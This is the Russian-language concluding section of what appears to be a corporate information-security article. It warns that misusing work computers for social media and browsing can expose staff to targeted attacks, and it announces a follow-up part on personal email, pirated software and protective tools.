    Заключение

    Нецелевое использование ресурсов компании не только приводит к прямым финансовым потерям, но также может стать причиной возникновения серьёзных инцидентов информационной безопасности. Активно используя рабочий компьютер для общения в социальных сетях и просмотра веб-сайтов, сотрудники компании могут стать жертвами и невольными пособниками злоумышленников, организовавших таргетированную атаку.

    Во второй части мы расскажем об инцидентах, связанных с использованием личной почты, пиратского ПО и загрузкой нелицензионного контента в корпоративной сети, и покажем, какие средства защиты позволят предотвратить возникновение подобных инцидентов.

    Ссылка на основную публикацию
    Статьи c упоминанием слов:
    Adblock
    detector